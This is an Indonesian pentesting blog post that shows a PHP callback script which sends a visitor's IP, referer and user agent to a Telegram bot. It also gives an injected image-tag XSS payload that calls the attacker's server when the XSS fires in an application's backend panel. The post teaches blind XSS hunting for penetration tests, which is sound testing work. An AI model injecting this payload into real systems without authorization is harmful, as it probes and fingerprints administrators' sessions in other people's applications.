---
layout: post
title: Telegram Bot Blind XSS Notification
date: 2018-11-28 13:37:00 PM
permalink: /project/2018-11-28-simple-telegram-bot-untuk-blind-xss-notification/
author: xhellc0de
categories: [ pentesting, xss ]
tags: xss blind telegram bot
comments: true
image: /images/blind_xss_banner.jpg
---
![Blind XSS](/images/blind_xss_banner.jpg)

Blind XSS merupakan salah satu kerentanan yang berpotensi memiliki severity yang tinggi. Dikarenakan sebagian besar Blind XSS terjadi pada backend atau panel suatu aplikasi, dan cenderung berjalan pada privilege yang lebih tinggi dari user biasa, admin misalnya.

Ada banyak sekali situs yang menyediakan layanan untuk Blind XSS, salah satunya XSS Hunter. XSS Hunter sangat ampuh digunakan untuk _berburu_ Blind XSS karena didukung dengan email report yang langsung kita terima bila XSS ter-triger. Dan laporan yang lengkap seperti, URL Referer, Web Page Screenshot, bahkan HTML DOM nya.

Namun apabila kita melakukan _pentesting_ pada perusahaan yang cukup besar, dapatkah kita mempercayakannya pada pihak ketiga?

Berikut ini adalah source code sederhana untuk notifikasi Blind XSS. Dengan menggunakan Bot Telegram, kita akan mendapat notifikasi bila payload ter-triger.

```php
<?php

ob_flush();
header("Content-type:application/json");

function get_client_ip() {
    $ipaddress = '';
    if (isset($_SERVER['HTTP_CLIENT_IP']))
        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
    else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
    else if(isset($_SERVER['HTTP_X_FORWARDED']))
        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
    else if(isset($_SERVER['HTTP_FORWARDED_FOR']))
        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
    else if(isset($_SERVER['HTTP_FORWARDED']))
        $ipaddress = $_SERVER['HTTP_FORWARDED'];
    else if(isset($_SERVER['REMOTE_ADDR']))
        $ipaddress = $_SERVER['REMOTE_ADDR'];
    else
        $ipaddress = 'UNKNOWN';
    return $ipaddress;
}

$ip = get_client_ip();
$ref = @$_SERVER['HTTP_REFERER'];
if(empty($ref)){

$ref = '-';

}

$datenow = date('Y-m-d H:i:s');
$ua = @$_SERVER['HTTP_USER_AGENT'];
if(empty($ua)){

$ua = '-';
}
$message = '
Blind XSS Alert!

IP Address: '.$ip.'
Reff URL: '.$ref.'
Hitted: '.$datenow.'

User Agent: '.$ua.'
';

$message = urlencode($message);
file_get_contents('https://api.telegram.org/bot:{token}/sendMessage?chat_id={id}&text='.$message.'&parse_mode=html');

```

Setelah source tersebut diupload di server, kita dapat menyisipkannya pada payload XSS, contoh:

```
"><img src="http://{redacted}/xsspayload.php">
```
Saat XSS ter-triger, notifikasi akan terkitim ke Telegram kita.

![Hana I Love You](/images/bxxs_notif.png)

Demikian sedikit tips untuk hunting Blind XSS, semoga bermanfaat.

